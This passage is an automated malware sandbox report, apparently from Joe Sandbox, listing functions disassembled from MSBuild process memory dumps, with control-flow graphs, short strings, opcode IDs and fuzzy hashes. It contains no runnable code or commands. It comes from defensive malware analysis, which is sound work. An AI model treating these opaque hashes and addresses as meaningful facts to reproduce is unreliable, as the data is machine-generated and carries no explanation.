                                                                                                            control_flow_graph 3046 22b1070-22b1090 3047 22b1092 3046->3047 3048 22b1097-22b112a 3046->3048 3047->3048 3055 22b1132-22b1167 3048->3055 3058 22b1169 3055->3058 3059 22b116e-22b11ce 3055->3059 3058->3059 3061 22b11d3-22b11f3 3059->3061 3062 22b11d0-22b11d1 3059->3062 3063 22b11f5-22b1200 3061->3063 3065 22b1203-22b122b 3061->3065 3062->3063 3063->3065 3066 22b1238-22b123b 3065->3066 3067 22b122d-22b122f 3065->3067 3068 22b123d 3066->3068 3069 22b1242-22b1287 3066->3069 3070 22b1231 3067->3070 3071 22b1236 3067->3071 3068->3069 3075 22b1289 3069->3075 3076 22b128e-22b12b3 3069->3076 3070->3071 3071->3069 3075->3076 3077 22b12ba-22b12fd 3076->3077 3078 22b12b5 3076->3078 3082 22b12ff 3077->3082 3083 22b1304-22b139b 3077->3083 3078->3077 3082->3083 3086 22b139d-22b13bb 3083->3086 3087 22b13c0-22b13f1 3083->3087 3088 22b149a-22b14d4 3086->3088 3089 22b1413-22b143d 3087->3089 3090 22b13f3-22b146f 3087->3090 3096 22b14d7-22b1521 3088->3096 3092 22b143f 3089->3092 3093 22b1444-22b1447 3089->3093 3094 22b1472-22b1498 3090->3094 3092->3093 3093->3094 3094->3088 3094->3096 3100 22b1528-22b1566 3096->3100 3101 22b1523 3096->3101 3103 22b1568 3100->3103 3104 22b156d-22b157c 3100->3104 3101->3100 3103->3104 3105 22b157e 3104->3105 3106 22b1583-22b15b0 3104->3106 3105->3106
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 35OG$5xID$]/
                                                                                                            • API String ID: 0-1761396499
                                                                                                            • Opcode ID: 1c0619472d44c294595a7dea279946797ae88c81557b297740fe6528c7f5facb
                                                                                                            • Instruction ID: 0c811d02f99e1888cd40362acc40962ab92096abc070968403fc7e4f8433886a
                                                                                                            • Opcode Fuzzy Hash: 1c0619472d44c294595a7dea279946797ae88c81557b297740fe6528c7f5facb
                                                                                                            • Instruction Fuzzy Hash: 8F029174E002198FDB50DFA9C990B9DBBF1BF48304F1481AAD909EB359EB34AA45CF51
                                                                                                            Function 0742D768 Relevance: 3.7, Strings: 2, Instructions: 1162COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2536027970.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_7420000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 6$@B/
                                                                                                            • API String ID: 0-3726057292
                                                                                                            • Opcode ID: 681ecd7a8c41a9d94b59dad98215fea37dbbb2c213dd6a9c56083e565f1ccd4b
                                                                                                            • Instruction ID: 30eefc588b10bdef65147068dcd45b3f3e6678c0812a635eaf5e856a9d1336ed
                                                                                                            • Opcode Fuzzy Hash: 681ecd7a8c41a9d94b59dad98215fea37dbbb2c213dd6a9c56083e565f1ccd4b
                                                                                                            • Instruction Fuzzy Hash: AEC2D5B4E012298FDB64DF69C988BDDBBB2BB49300F5481EAD409A7355DB309E81CF54
                                                                                                            Function 06690968 Relevance: 3.6, Strings: 2, Instructions: 1143COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 3499 6690968-66909a4 3500 66909ab-6690a5c 3499->3500 3501 66909a6 3499->3501 3506 6690a5e 3500->3506 3507 6690a63-6690a9c 3500->3507 3501->3500 3506->3507 3510 6690a9e 3507->3510 3511 6690aa3-6690ad9 3507->3511 3510->3511 3513 6690adb 3511->3513 3514 6690ae0-6690b01 3511->3514 3513->3514 3516 6690b03-6690b0d 3514->3516 3517 6690b12-6690b43 3514->3517 3518 6691e3d-6691e47 3516->3518 3521 6690b4b-6690b8a 3517->3521 3522 6690b8c-6690bbb 3521->3522 3523 6690b97-6690ba8 3521->3523 3525 6690bbe-6690c4d 3522->3525 3523->3525 3527 6690c4f-6690f13 3525->3527 3528 6690c84-6690ccb 3525->3528 3532 6690f19-6690f48 3527->3532 3530 6690ccd-6690d9c 3528->3530 3531 6690cff-6690d42 3528->3531 3535 6690d9e-6690e51 3530->3535 3536 6690dd0-6690e13 3530->3536 3534 6690e9b-6690ed9 3531->3534 3540 6690f4a 3532->3540 3541 6690f4f-6690f95 3532->3541 3534->3532 3542 6690e58 3535->3542 3543 6690e53 3535->3543 3539 6690e5e-6690e95 3536->3539 3539->3534 3540->3541 3546 6691dc2-6691df5 3541->3546 3542->3539 3543->3542 3548 6691dfb-6691e3c 3546->3548 3549 6690f9a-6690f9d 3546->3549 3548->3518 3551 6690fa3-6690fbf 3549->3551 3551->3551 3553 6690fc1-669100d 3551->3553 3556 669100f 3553->3556 3557 6691014-66910c2 3553->3557 3556->3557 3563 66910c9-6691179 3557->3563 3564 66910c4 3557->3564 3570 669117b 3563->3570 3571 6691180-66911df 3563->3571 3564->3563 3570->3571 3575 66911e1 3571->3575 3576 66911e6-669122f 3571->3576 3575->3576 3576->3551 3579 6691235-669124c 3576->3579 3579->3551 3580 6691252-669127c 3579->3580 3580->3551 3581 6691282-66912da 3580->3581 3584 66912dc 3581->3584 3585 66912e1-669135a 3581->3585 3584->3585 3588 669135c-669140b 3585->3588 3589 669138e-66913d1 3585->3589 3591 6691411-6691491 3588->3591 3589->3591 3592 66914e0-6691540 3591->3592 3593 6691493-66919c8 3591->3593 3595 669158f-66915ea 3592->3595 3596 6691542-6691915 3592->3596 3600 66919ce-66919fd 3593->3600 3598 6691639-669169f 3595->3598 3599 66915ec-6691862 3595->3599 3601 669191b-6691971 3596->3601 3603 66916eb-669173d 3598->3603 3604 66916a1-66917af 3598->3604 3605 6691868-66918be 3599->3605 3613 66919ff 3600->3613 3614 6691a04-6691a5a 3600->3614 3601->3600 3607 669174a-669174d 3603->3607 3608 669173f-6691741 3603->3608 3610 66917b5-669180b 3604->3610 3605->3601 3615 669174f 3607->3615 3616 6691754-669175a 3607->3616 3611 6691748 3608->3611 3612 6691743 3608->3612 3610->3605 3611->3616 3612->3611 3613->3614 3619 6691a5c 3614->3619 3620 6691a61-6691a8e 3614->3620 3615->3616 3616->3610 3619->3620 3622 6691a90 3620->3622 3623 6691a95-6691b1d 3620->3623 3622->3623 3628 6691b1f 3623->3628 3629 6691b24-6691b95 3623->3629 3628->3629 3633 6691b9c-6691bf2 3629->3633 3634 6691b97 3629->3634 3637 6691bf9-6691c26 3633->3637 3638 6691bf4 3633->3638 3634->3633 3640 6691c28 3637->3640 3641 6691c2d-6691c78 3637->3641 3638->3637 3640->3641 3641->3551 3644 6691c7e-6691ca2 3641->3644 3644->3551 3645 6691ca8-6691cdf 3644->3645 3645->3551 3647 6691ce5-6691d0c 3645->3647 3647->3551 3648 6691d12-6691d34 3647->3648 3648->3551 3649 6691d3a-6691d49 3648->3649 3649->3551 3650 6691d4f-6691d51 3649->3650 3651 6691d62-6691d8a 3650->3651 3652 6691d8c-6691da1 3651->3652 3653 6691dbe-6691dbf 3651->3653 3652->3651 3654 6691da3-6691da8 3652->3654 3653->3546 3654->3653 3655 6691daa-6691dbd 3654->3655 3655->3653
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 7qs$D
                                                                                                            • API String ID: 0-3494831700
                                                                                                            • Opcode ID: 50ba88d81185b8413b84c671c7a3efd6441d0a319a6c60a658cc11b17620850f
                                                                                                            • Instruction ID: b5af2b9511156b2b2a6e06a04dc1a46d40c54253baeeaea5d5f1f8a838392443
                                                                                                            • Opcode Fuzzy Hash: 50ba88d81185b8413b84c671c7a3efd6441d0a319a6c60a658cc11b17620850f
                                                                                                            • Instruction Fuzzy Hash: C8D25E74E012298FDBA5DF68C984B99BBF5BB49300F1481EAE819E7355D730AE81CF50
                                                                                                            Function 0669C970 Relevance: 3.6, Strings: 2, Instructions: 1099COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: <IS)$Teq
                                                                                                            • API String ID: 0-1308006108
                                                                                                            • Opcode ID: cc33f414fb2fa5fd1a47e76e9e3d79e009b3fd232f88114565aea87e11f8e85a
                                                                                                            • Instruction ID: 9f11d2d694e1a27f246d846eb23ba2833a56e721fb2e7b213c4ddb66d5df884a
                                                                                                            • Opcode Fuzzy Hash: cc33f414fb2fa5fd1a47e76e9e3d79e009b3fd232f88114565aea87e11f8e85a
                                                                                                            • Instruction Fuzzy Hash: 67C25B78E016298FDBA4DF68C984B99BBF5BF49300F1481A6E809E7355D730AE81CF54
                                                                                                            Function 0669C960 Relevance: 3.3, Strings: 2, Instructions: 791COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: <IS)$Teq
                                                                                                            • API String ID: 0-1308006108
                                                                                                            • Opcode ID: 6577f4bdf3ed68f41fb97acb9616499b439b5ff686c11238c50738dbc8172349
                                                                                                            • Instruction ID: 5d3fbc68a78a9e74a41dcaf152eca72da767950306449748165eb278aa2883fb
                                                                                                            • Opcode Fuzzy Hash: 6577f4bdf3ed68f41fb97acb9616499b439b5ff686c11238c50738dbc8172349
                                                                                                            • Instruction Fuzzy Hash: A4928D74E016298FDBA0DF68C984B99BBB5BF49300F1481E6E809E7355DB34AE81CF50
                                                                                                            Function 06693B50 Relevance: 3.2, Strings: 2, Instructions: 714COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 4170 6693b50-6693b8b 4171 6693b8d 4170->4171 4172 6693b92-6693bf4 4170->4172 4171->4172 4175 6693bfa-6693c3f 4172->4175 4178 6693c41 4175->4178 4179 6693c46-6693c7d 4175->4179 4178->4179 4182 6693c7f 4179->4182 4183 6693c84-6693cb8 4179->4183 4182->4183 4185 6693cba 4183->4185 4186 6693cbf-6693ce0 4183->4186 4185->4186 4188 6693cf1-6693d07 4186->4188 4189 6693ce2-6693cec 4186->4189 4193 6693d0f-6693d58 4188->4193 4190 6694706-669473c 4189->4190 4197 6693d5a 4193->4197 4198 6693d5f-6693da2 4193->4198 4197->4198 4202 66946bc-66946e3 4198->4202 4204 66946e9-6694705 4202->4204 4205 6693da7-6693dc9 4202->4205 4204->4190 4205->4175 4207 6693dcf-6693dea 4205->4207 4207->4175 4208 6693df0-6693e20 4207->4208 4209 6693e28-6693e44 4208->4209 4210 6693e22-6693e23 4208->4210 4209->4209 4211 6693e46-6693ebd 4209->4211 4210->4175 4216 6693ebf 4211->4216 4217 6693ec4-6693f15 4211->4217 4216->4217 4221 6693f1c-6693f6e 4217->4221 4222 6693f17 4217->4222 4221->4209 4225 6693f74-6693f8c 4221->4225 4222->4221 4225->4209 4226 6693f92-6693fa0 4225->4226 4226->4209 4227 6693fa6-6693ff6 4226->4227 4230 6693ff8 4227->4230 4231 6693ffd-669404e 4227->4231 4230->4231 4235 6694050 4231->4235 4236 6694055-6694080 4231->4236 4235->4236 4238 6694082 4236->4238 4239 6694087-66940b8 4236->4239 4238->4239 4241 66940ba-66940ce 4239->4241 4242 66940d0-66940dc 4239->4242 4243 66940e6-6694156 4241->4243 4242->4243 4247 6694158 4243->4247 4248 669415d-66941ba 4243->4248 4247->4248 4252 66941bc 4248->4252 4253 66941c1-6694246 4248->4253 4252->4253 4258 6694248 4253->4258 4259 669424d-66942aa 4253->4259 4258->4259 4263 66942ac 4259->4263 4264 66942b1-66942e2 4259->4264 4263->4264 4266 66942fa-6694306 4264->4266 4267 66942e4-66942f8 4264->4267 4268 6694310-6694380 4266->4268 4267->4268 4272 6694382 4268->4272 4273 6694387-66943e4 4268->4273 4272->4273 4277 66943eb-6694416 4273->4277 4278 66943e6 4273->4278 4280 6694418 4277->4280 4281 669441d-66944ae 4277->4281 4278->4277 4280->4281 4286 66944b0 4281->4286 4287 66944b5-6694512 4281->4287 4286->4287 4291 6694519-669459e 4287->4291 4292 6694514 4287->4292 4297 66945a0 4291->4297 4298 66945a5-6694618 4291->4298 4292->4291 4297->4298 4298->4209 4303 669461e-6694653 4298->4303 4304 669465b-669465c 4303->4304 4305 6694655-6694656 4303->4305 4306 669466d-6694681 4304->4306 4305->4209 4307 6694683-6694696 4306->4307 4308 6694697-66946a4 4306->4308 4307->4308 4308->4306 4309 66946a6-66946b7 4308->4309 4309->4202 4311 66946b9-66946ba 4309->4311 4311->4306
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: .$1
                                                                                                            • API String ID: 0-1839485796
                                                                                                            • Opcode ID: 6383a39873497dde05941bc0f6a127cc5fa3805614e9b9db8fa38f2d2ec36d72
                                                                                                            • Instruction ID: ae4cb111c0d479f7e36b877341bb1c545fb9f36633da9b2f144baed0b78271d8
                                                                                                            • Opcode Fuzzy Hash: 6383a39873497dde05941bc0f6a127cc5fa3805614e9b9db8fa38f2d2ec36d72
                                                                                                            • Instruction Fuzzy Hash: F672B174E016288FDB64DF69C981BDDBBB2BF49310F1482A9E519A7394DB309E81CF50
                                                                                                            Function 06697A50 Relevance: 3.2, Strings: 2, Instructions: 663COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 4312 6697a50-6697a71 4313 6697a78-6697aac 4312->4313 4314 6697a73 4312->4314 4317 6697ab3-6697add 4313->4317 4314->4313 4319 66986d0-66986e4 4317->4319 4321 66986ea-669870e 4319->4321 4322 6697ae2-6697afa 4319->4322 4328 669870f 4321->4328 4325 6697afb-6697b1c 4322->4325 4325->4325 4327 6697b1e-6697b4b 4325->4327 4330 6697b4d 4327->4330 4331 6697b52-6697b79 4327->4331 4328->4328 4330->4331 4333 6697b7b 4331->4333 4334 6697b80-6697ba9 4331->4334 4333->4334 4336 6697baf-6697c61 4334->4336 4337 6698656-669866c 4334->4337 4345 6697c63-6697d13 4336->4345 4346 6697c95-6697cd8 4336->4346 4338 669866e-669866f 4337->4338 4339 6698674-66986cf 4337->4339 4338->4325 4339->4319 4351 6697d20-6697d23 4345->4351 4352 6697d15-6697d17 4345->4352 4348 6697d30-6697d90 4346->4348 4349 6697dd3-6697e25 4348->4349 4350 6697d92-669859f 4348->4350 4356 6697e68-6697ebf 4349->4356 4357 6697e27-6698163 4349->4357 4360 66985a5-66985d7 4350->4360 4353 6697d2a 4351->4353 4354 6697d25 4351->4354 4358 6697d19 4352->4358 4359 6697d1e 4352->4359 4353->4348 4354->4353 4362 6697eff-6697f49 4356->4362 4363 6697ec1-6697f9d 4356->4363 4364 6698165-66984bb 4357->4364 4365 66981a6-6698217 4357->4365 4358->4359 4359->4353 4379 66985d9 4360->4379 4380 66985de-6698632 4360->4380 4367 66980c4-669810e 4362->4367 4373 6697fdd-669802a 4363->4373 4374 6697f9f-6698075 4363->4374 4376 66984c1-6698504 4364->4376 4370 6698219-66982fc 4365->4370 4371 6698257-66982a6 4365->4371 4368 669850a-6698554 4367->4368 4368->4360 4382 669833c-6698386 4370->4382 4383 66982fe-66983d0 4370->4383 4378 6698426-6698470 4371->4378 4375 669807b-66980be 4373->4375 4374->4375 4375->4367 4376->4368 4378->4376 4379->4380 4380->4336 4390 6698638-669864e 4380->4390 4385 66983dd-6698420 4382->4385 4387 66983d2 4383->4387 4388 66983d7 4383->4388 4385->4378 4387->4388 4388->4385 4390->4337 4391 6698650-6698651 4390->4391 4391->4336
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0b~$P}\
                                                                                                            • API String ID: 0-94426273
                                                                                                            • Opcode ID: aa9d6cb68bd51be6f68ec68f017a2ca9c02f378f106cd1c88c0bd62b9d463f48
                                                                                                            • Instruction ID: 802f098b96a0cf9957899bacdd6f834b0c7eed65e3625c52cf8de22e9243f7d5
                                                                                                            • Opcode Fuzzy Hash: aa9d6cb68bd51be6f68ec68f017a2ca9c02f378f106cd1c88c0bd62b9d463f48
                                                                                                            • Instruction Fuzzy Hash: FE821A74E052298FDBA0CF68C984BD9BBF5AB49300F1085EAD84DE7355E730AE858F54
                                                                                                            Function 06696CC0 Relevance: 3.1, Strings: 2, Instructions: 622COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 4510 6696cc0-6696ce0 4511 6696ce2 4510->4511 4512 6696ce7-6696d53 4510->4512 4511->4512 4515 6696d58-6696d69 4512->4515 4516 6696d55-6696d78 4512->4516 4517 6696d7b-6696daa 4515->4517 4516->4517 4520 6696dac 4517->4520 4521 6696db1-6696df0 4517->4521 4520->4521 4523 6696df2 4521->4523 4524 6696df7-6696e0a 4521->4524 4523->4524 4525 6696e13-6696e2a 4524->4525 4526 6696e2c 4525->4526 4527 6696e31-6696e52 4525->4527 4526->4527 4529 6696e59-6696e9f 4527->4529 4530 6696e54 4527->4530 4533 6696ea1-6696eec 4529->4533 4534 6696eb5-6696ece 4529->4534 4530->4529 4538 6696ef3-6696f27 4533->4538 4536 6696ed0 4534->4536 4537 6696ed5-6696ed8 4534->4537 4536->4537 4537->4538 4540 6696f29 4538->4540 4541 6696f2e-6696f89 4538->4541 4540->4541 4545 6696f8b 4541->4545 4546 6696f90-6696fc5 4541->4546 4545->4546 4548 6696fcc-6696fef 4546->4548 4549 6696fc7 4546->4549 4551 669778d-66977a1 4548->4551 4549->4548 4553 6696ff4-6697005 4551->4553 4554 66977a7-66977c4 4551->4554 4556 669700c-6697029 4553->4556 4557 6697007 4553->4557 4558 66977d3 4554->4558 4559 66977c6-66977d2 4554->4559 4563 669702b-6697037 4556->4563 4564 6697053 4556->4564 4557->4556 4562 66977d4 4558->4562 4559->4558 4562->4562 4566 6697039-669703f 4563->4566 4567 6697041-6697047 4563->4567 4565 6697059-669705f 4564->4565 4568 6697060-6697084 4565->4568 4569 6697051 4566->4569 4567->4569 4568->4568 4570 6697086-66970dd 4568->4570 4569->4565 4574 66970df 4570->4574 4575 66970e4-6697166 4570->4575 4574->4575 4581 6697168 4575->4581 4582 669716d-66971a6 4575->4582 4581->4582 4585 66971a8 4582->4585 4586 66971ad-669720f 4582->4586 4585->4586 4588 669724b-6697288 4586->4588 4589 6697211-6697249 4586->4589 4590 669728e-66972e5 4588->4590 4589->4590 4595 66972ec-6697380 4590->4595 4596 66972e7 4590->4596 4602 6697382 4595->4602 4603 6697387-66973c9 4595->4603 4596->4595 4602->4603 4606 66973cb 4603->4606 4607 66973d0-6697435 4603->4607 4606->4607 4609 6697471-66974ae 4607->4609 4610 6697437-669746f 4607->4610 4611 66974b4-669750b 4609->4611 4610->4611 4616 669750d 4611->4616 4617 6697512-66975a6 4611->4617 4616->4617 4623 66975a8 4617->4623 4624 66975ad-66975ef 4617->4624 4623->4624 4627 66975f1 4624->4627 4628 66975f6-669765b 4624->4628 4627->4628 4630 669765d-6697695 4628->4630 4631 6697697-66976d4 4628->4631 4632 66976da-6697702 4630->4632 4631->4632 4635 6697709-6697753 4632->4635 4636 6697704 4632->4636 4635->4568 4639 6697759-6697773 4635->4639 4636->4635 4639->4568 4640 6697779-669778c 4639->4640 4640->4551
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Wf$e
                                                                                                            • API String ID: 0-4159974372
                                                                                                            • Opcode ID: 5c19f892d898713f125eaef803d4ec2a7eee792e12b072657d64238b061de423
                                                                                                            • Instruction ID: 259c87b0750910e5f2cb33ed4a6f6b1ab16e64a691840f791872bb98966fb373
                                                                                                            • Opcode Fuzzy Hash: 5c19f892d898713f125eaef803d4ec2a7eee792e12b072657d64238b061de423
                                                                                                            • Instruction Fuzzy Hash: F9628C74E002288FDB64DF68C984BDDBBB2BF49300F1481A9D819AB354DB35AE85CF50
                                                                                                            Function 072C2FF0 Relevance: 2.1, Strings: 1, Instructions: 858COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2535711769.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_72c0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: S_o*
                                                                                                            • API String ID: 0-2797774947
                                                                                                            • Opcode ID: 7e035999d079727097f693efbc46584ee1c1df66e5206107f67bbe63e56d34e3
                                                                                                            • Instruction ID: e72d73d53dbcf653d8f6b7a73474ff79463dcfcec28c788c6bbad965f43338f9
                                                                                                            • Opcode Fuzzy Hash: 7e035999d079727097f693efbc46584ee1c1df66e5206107f67bbe63e56d34e3
                                                                                                            • Instruction Fuzzy Hash: D6A23AB4E112298FDB60DF68C984BD9BBF5BB49310F1085EAA80DE7351D730AE818F45
                                                                                                            Function 0742B818 Relevance: 2.1, Strings: 1, Instructions: 841COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2536027970.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_7420000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 0-4108050209
                                                                                                            • Opcode ID: bae05cfef2985d669ed0086674f29664b9b68d6baaaa9811f14e53f2ff5c97b6
                                                                                                            • Instruction ID: cfa4daae56b27abfb377887d614ea47ce254d0925d51166525965f731274d0ff
                                                                                                            • Opcode Fuzzy Hash: bae05cfef2985d669ed0086674f29664b9b68d6baaaa9811f14e53f2ff5c97b6
                                                                                                            • Instruction Fuzzy Hash: D992D7B4E006298FDB64DF68C984BDDBBB2BF49300F54819AD419AB395DB349E81CF50
                                                                                                            Function 0742C8B8 Relevance: 2.0, Strings: 1, Instructions: 753COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2536027970.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_7420000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: N
                                                                                                            • API String ID: 0-1130791706
                                                                                                            • Opcode ID: 2090f80d14ce9066647e49804f9360fd7da8a58b6c7e4da412f6048a5fa23887
                                                                                                            • Instruction ID: 46439dff6cfc32c4191fb70814b72aba8e0e47e282dacf321fee783ce1b6a37e
                                                                                                            • Opcode Fuzzy Hash: 2090f80d14ce9066647e49804f9360fd7da8a58b6c7e4da412f6048a5fa23887
                                                                                                            • Instruction Fuzzy Hash: FD922BB4E016298FDBA4DF69C984BDDBBF1AB49300F5081EAE809E7351D7309E818F50
                                                                                                            Function 072CB980 Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2535711769.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_72c0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5a689eeef0c2579b9788a7845988198fe129d981b0794ce251e5b5fe5c6dbc2d
                                                                                                            • Instruction ID: 5e0f5d892670183c8e1b345ad40f0e17e17e06885a7d57691c7972b4d4079ee2
                                                                                                            • Opcode Fuzzy Hash: 5a689eeef0c2579b9788a7845988198fe129d981b0794ce251e5b5fe5c6dbc2d
                                                                                                            • Instruction Fuzzy Hash: 8BF18CB0A1030ACFDB14DFA9C845B9DBBF1FF58714F158269E805AB2A5DB70A945CF80
                                                                                                            Function 07412B98 Relevance: 1.9, Strings: 1, Instructions: 616COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2535967631.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_7410000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: d:p
                                                                                                            • API String ID: 0-2286290242
                                                                                                            • Opcode ID: 44d4f04a4103bfc2920b684c31257534efc1fc1d6461bb2151cd469f14d31791
                                                                                                            • Instruction ID: d77ebcbdef6967f3d9bf56450b22b6e4c25d4404c16e399e24930321b86dd45a
                                                                                                            • Opcode Fuzzy Hash: 44d4f04a4103bfc2920b684c31257534efc1fc1d6461bb2151cd469f14d31791
                                                                                                            • Instruction Fuzzy Hash: 51628DB4E006298FDB64DF69C984BDDBBF2BB49310F1485AAE819E7354D7309A81CF50
                                                                                                            Function 022BC880 Relevance: 1.8, Strings: 1, Instructions: 560COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \Lg
                                                                                                            • API String ID: 0-2236610822
                                                                                                            • Opcode ID: 1009e0a1d8c8d4071eeac348a3b7f02900e180c0e87bb5ec66ac2a1caa546568
                                                                                                            • Instruction ID: 5c937ea1127f3c34cc190cb1da14ba8cb528fc3a69d9f79c2f3a9afdb82f4731
                                                                                                            • Opcode Fuzzy Hash: 1009e0a1d8c8d4071eeac348a3b7f02900e180c0e87bb5ec66ac2a1caa546568
                                                                                                            • Instruction Fuzzy Hash: 05429D78E11219CFDB54CFA8C980B9DBBF5BF49300F1481AAD919AB355E730AA85CF50
                                                                                                            Function 022BC7B5 Relevance: 1.7, Strings: 1, Instructions: 495COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \Lg
                                                                                                            • API String ID: 0-2236610822
                                                                                                            • Opcode ID: 80b19ae33f10e585ec51f45c1f33829a680f27787da2778d4a8585a5d5135bdb
                                                                                                            • Instruction ID: eebad4a2a35a70794d6f31a488a3b9f997fc9931e142077c3bf2b0886f9bc464
                                                                                                            • Opcode Fuzzy Hash: 80b19ae33f10e585ec51f45c1f33829a680f27787da2778d4a8585a5d5135bdb
                                                                                                            • Instruction Fuzzy Hash: 3032D274E052198FDB55CFA8C980ADDBBF1BF49304F1581AAD448EB356E730AA86CF50
                                                                                                            Function 022BC843 Relevance: 1.7, Strings: 1, Instructions: 436COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
